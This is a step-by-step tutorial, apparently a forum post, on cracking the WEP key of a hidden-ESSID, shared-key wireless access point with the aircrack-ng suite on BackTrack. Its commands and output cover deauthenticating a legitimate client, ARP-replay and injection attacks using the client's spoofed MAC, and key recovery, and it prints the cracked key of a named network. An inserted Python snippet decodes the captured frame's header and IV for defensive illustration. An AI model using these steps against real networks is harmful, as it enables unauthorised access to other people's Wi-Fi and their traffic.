Cracking the WEP key of an AP with a hidden ESSID and shared-key authentication
Preface: to successfully crack the WEP key of an AP with a hidden ESSID and shared-key authentication, there must be a legitimate client; otherwise all effort is in vain. What follows is the experience I gained over many attempts, shared here with everyone.
root@bt:~# ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:03:0D:65:EC:EF
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
          Interrupt:19 Base address:0xa000

eth1      Link encap:UNSPEC  HWaddr 00-15-F2-00-00-00
          UP BROADCAST NOTRAILERS PROMISC ALLMULTI  MTU:1500  Metric:1
          RX packets:289685 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:11280435 (10.7 MiB)  TX bytes:0 (0.0 b)
          Interrupt:11

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
1. This command finds your own wireless card's MAC address and the name of its interface under BT, which you can think of as the wireless card's alias.
Note: the information obtained here is MAC address 00-15-F2-00-00-00 and interface eth1.
root@bt:~# ifconfig -a eth1
eth1      Link encap:UNSPEC  HWaddr 00-15-F2-00-00-00
          UP BROADCAST NOTRAILERS PROMISC ALLMULTI  MTU:1500  Metric:1
          RX packets:295529 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:11545931 (11.0 MiB)  TX bytes:0 (0.0 b)
          Interrupt:11
2. This command is used to activate the wireless card's interface eth1.
root@bt:~# airmon-ng start eth1 1

Interface       Chipset         Driver

eth1            Broadcom        bcm43xx (monitor mode enabled)
3. This command puts the wireless card into monitor mode and specifies the channel to monitor.
Note: eth1 here is the interface obtained in step 1; 1 is the wireless AP's channel, which can be found with the appropriate software.
root@bt:~# airodump-ng --ivs -w 0523 -c 1 eth1

 [CH 1 ][ Elapsed: 4 s ][ 2009-05-23 09:40 ]

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 00:1E:40:87:45:BB    0 100       61        0    0   1  54  WEP  WEP         <length: 13>

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes
4. This command obtains the wireless AP's MAC address and name. Here the AP's MAC address is 00:1E:40:87:45:BB; because the AP has hidden its ESSID, this command cannot yet obtain the AP's name.
Note: the AP's MAC address is the value under BSSID, and the AP's name is the value under ESSID.
 [CH 1 ][ Elapsed: 3 mins ][ 2009-05-23 1 09:43 ][ Broken SKA: 00:1E:40:87:45:BB ]

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 00:1E:40:87:45:BB    0 100    18221    26151    0   1  54  WEP  WEP    SKA  ChinaNet-W4J7

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes

 00:1E:40:87:45:BB  00:21:5D:36:94:04    0    0- 0    48    11621  ChinaNet-W4J7
5. When the ESSID is hidden, aireplay-ng -0 1 -a 00:1E:40:87:45:BB -c 00:21:5D:36:94:04 eth1 can be used to obtain the wireless AP's name.
Note: 00:1E:40:87:45:BB is the AP's MAC address, 00:21:5D:36:94:04 is the legitimate client's MAC address, and eth1 is the interface name obtained in step 1.
In fact, as soon as a legitimate client connects to the AP, its ESSID is displayed automatically, so the command above is not needed to obtain the ESSID. This command can therefore be skipped: wait for a legitimate client to connect to the AP on its own, and the AP's ESSID appears by itself.
root@bt:~# aireplay-ng -3 -b 001e408745bb -h 00215d369404 eth1
The interface MAC (00:15:F2:00:00:00) doesn't match the specified MAC (-h).
        ifconfig eth1 hw ether 00:21:5D:36:94:04
09:41:37  Waiting for beacon frame (BSSID: 00:1E:40:87:45:BB) on channel 1
Saving ARP requests in replay_arp-0523-094137.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
……
Read 854654 packets (got 23571 ARP requests and 259428 ACKs), sent 352396 packets...(500 pps)
6. This command is used to obtain the packets needed for cracking.
Note: 00:1E:40:87:45:BB is the AP's MAC address, 00:21:5D:36:94:04 is the legitimate client's MAC address, and eth1 is the interface name obtained in step 1.
root@bt:~# aireplay-ng -2 -x 1024 eth1
For information, no action required: Using gettimeofday() instead of /dev/rtc
No source MAC (-h) specified. Using the device MAC (00:15:F2:00:00:00)
Read 8431 packets...

        Size: 368, FromDS: 0, ToDS: 1 (WEP)

              BSSID  =  00:1E:40:87:45:BB
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:21:5D:36:94:04

        0x0000:  0841 2c00 001e 4087 45bb 0021 5d36 9404  .A,...@.E..!]6..
        0x0010:  ffff ffff ffff 704d 0300 0000 afd9 860a  ......pM........
        0x0020:  5954 8dd4 07d4 633f 0858 b8eb 9331 b035  YT....c?.X...1.5
        0x0030:  5fbb fc0f e087 e0f0 4e6b dcf9 9fda eadd  _.......Nk......
        0x0040:  8f61 a8ca 0e2f d955 e7fa bfc9 8200 29e2  .a.../.U......).
        0x0050:  ec0c 8398 063b df69 3ce0 3035 ccd7 68d7  .....;.i<.05..h.
        0x0060:  eb5d 1a5b 75cb 6d84 7b83 e057 abab c292  .].[u.m.{..W....
        0x0070:  a4bd 49c3 31aa ffa0 5793 adb1 6d17 2b1a  ..I.1...W...m.+.
        0x0080:  6e41 898c e65b 2332 7e2c 4f2f 0640 0647  nA...[#2~,O/.@.G
        0x0090:  baea faaa 995d 9b7f 2efb 5da6 66d8 5971  .....]...].f.Yq
        0x00a0:  336b 9b49 c1f6 8736 fe2b b2ee 007b c71b  3k.I...6.+...{..
        0x00b0:  e7ba 51c5 c70f d31f 97d8 737f 3bda 00f6  ..Q.......s;...
        0x00c0:  760e 64cf b112 b2b9 44a0 d9a7 3349 c88b  v.d.....D...3I..
        0x00d0:  551f 0780 3817 84e8 a2ba b6b2 4b95 2a86  U...8.......K.*.
        --- CUT ---

Use this packet ? y

Saving chosen packet in replay_src-0523-095442.cap
You should also start airodump-ng to capture replies.
7. This command attacks the wireless AP. When it starts, it captures a packet; press Y and the attack proceeds. If the captured packet is the right one, the number under #Data in the step-4 window can be seen rising rapidly.
Note: the 1024 after -x is the injection rate (packets per second); eth1 is the interface name obtained in step 1.
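As an added illustration that is not part of the original tutorial, the Python below decodes the first 32 bytes of the frame that aireplay-ng printed in step 7 (taken from the page's hex dump and embedded as a constant). It shows why the #Data counter matters to a defender: every WEP data frame carries its 24-bit IV and key index in the clear right after the MAC header, so an observer needs nothing but a passive capture to collect them, and a monitoring tool can spot a replay flood as the same source, sequence number and IV recurring at hundreds of frames per second.

```python
import struct

# Constructed input: the first two dump lines shown above (24-byte MAC header,
# 4-byte WEP IV/key-index field, then the first 4 encrypted payload bytes).
FRAME_HEX = ("0841 2c00 001e 4087 45bb 0021 5d36 9404"
             "ffff ffff ffff 704d 0300 0000 afd9 860a")
PAGE_FRAME = bytes.fromhex(FRAME_HEX.replace(" ", ""))

def mac(raw: bytes) -> str:
    """Format six raw bytes as a colon-separated MAC address."""
    return ":".join(f"{b:02X}" for b in raw)

def parse_wep_data_frame(frame: bytes) -> dict:
    """Decode the 802.11 MAC header and, when the Protected bit is set,
    the WEP IV and key index that follow it unencrypted."""
    fc_lo, flags = frame[0], frame[1]
    info = {
        "type": (fc_lo >> 2) & 0x3,       # 2 = data frame
        "subtype": fc_lo >> 4,
        "to_ds": bool(flags & 0x01),
        "from_ds": bool(flags & 0x02),
        "protected": bool(flags & 0x40),  # "Protected Frame" (WEP here)
        "duration": struct.unpack_from("<H", frame, 2)[0],
    }
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    # Which address is BSSID, source and destination depends on ToDS/FromDS.
    if info["to_ds"] and not info["from_ds"]:
        bssid, src, dst = a1, a2, a3      # station -> AP (the page's frame)
    elif info["from_ds"] and not info["to_ds"]:
        dst, bssid, src = a1, a2, a3      # AP -> station
    elif not info["to_ds"] and not info["from_ds"]:
        dst, src, bssid = a1, a2, a3      # IBSS or management frame
    else:
        raise ValueError("WDS frame (ToDS and FromDS) has a 4th address")
    info.update(bssid=mac(bssid), src=mac(src), dst=mac(dst))
    seq_ctrl = struct.unpack_from("<H", frame, 22)[0]
    info["fragment"], info["sequence"] = seq_ctrl & 0xF, seq_ctrl >> 4
    if info["protected"]:
        # WEP: 3 IV bytes in the clear, then a byte whose top 2 bits pick the key slot.
        info["iv"] = frame[24:27].hex()
        info["key_index"] = frame[27] >> 6
    return info

if __name__ == "__main__":
    for field, value in parse_wep_data_frame(PAGE_FRAME).items():
        print(f"{field:>10}: {value}")
```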
root@bt:~# aircrack-ng -n 64 *.ivs
Opening 0523-01.ivs
Read 7801 packets.

   #  BSSID              ESSID                     Encryption

   1  00:1E:40:87:45:BB  ChinaNet-W4J7             WEP (7800 IVs)

Choosing first network as target.

Opening 0523-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 7800 ivs.

                                 Aircrack-ng 1.0 rc1 r1085

                 [00:02:56] Tested 261076 keys (got 16216 IVs)

   KB    depth   byte(vote)
    0    5/ 34   07(20480) 4B(20480) 89(20480) 11(20224) 1B(20224)
    1    4/ 12   96(20736) 7A(20224) B7(19968) C1(19968) 8A(19712)
    2    0/  7   21(23040) AD(22016) 9A(20736) F7(20480) 2A(20480)
    3    8/ 11   09(19968) 0F(19712) 50(19712) 58(19712) 96(19712)
    4    2/  9   88(22016) 0E(21760) 28(21760) C4(20736) 70(20736)

                     KEY FOUND! [ 07:96:21:92:88 ]
        Decrypted correctly: 100%
8. When #Data in the step-4 window reaches 10000 or more, open a new window and try to crack the AP's key.
Note: the 64 after -n indicates the key length in bits; if you do not know the exact length, use aircrack-ng *.ivs and let the tool determine the key length automatically and crack it.
The window below shows the command for the handshake with the wireless router, i.e. the command for connecting to the wireless AP. I did not use this command and still successfully cracked the AP's key, so in my opinion this command, like many of the commands mentioned in other cracking tutorials, is not one that must be executed for the crack to succeed.
root@bt:~# aireplay-ng -1 0 -e ChinaNet-W4J7 -a 001e408745bb -h 00215d369404 eth1
The interface MAC (00:15:F2:00:00:00) doesn't match the specified MAC (-h).
        ifconfig eth1 hw ether 00:21:5D:36:94:04
09:46:44  Waiting for beacon frame (BSSID: 00:1E:40:87:45:BB) on channel 1

09:46:44  Sending Authentication Request (Open System) [ACK]
09:46:44  Switching to shared key authentication
Read 5247 packets...

09:54:42  Sending Authentication Request (Shared Key) [ACK]
09:54:42  Authentication 1/2 successful
09:54:42  You should specify a xor file (-y) with at least 151 keystreambytes
09:54:42  Trying fragmented shared key fake auth.
09:54:42  Sending encrypted challenge. [ACK]
09:54:42  Got a deauthentication packet! (Waiting 3 seconds)
……
10:11:15  Sending Authentication Request (Shared Key) [ACK]
10:11:17  Sending Authentication Request (Shared Key)

Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * Try to change the number of packets (-o option).
    * The driver/card doesn't support injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * You're too far from the AP. Get closer, or lower the transmit rate.

root@bt:~#
Summary: from my many attempts, to crack a WEP key where the ESSID is hidden or shared-key authentication is used, there must be a legitimate client. As you can see throughout my tutorial, the MAC addresses used were all the legitimate client's; my own wireless card's MAC address was never used once, so the MAC-spoofing step can be skipped when a legitimate client's address is available. Also, when there is plenty of traffic, i.e. when #Data is rising fast, you can go straight to step 8 after completing the first four steps, and in most cases the AP's key can be cracked successfully.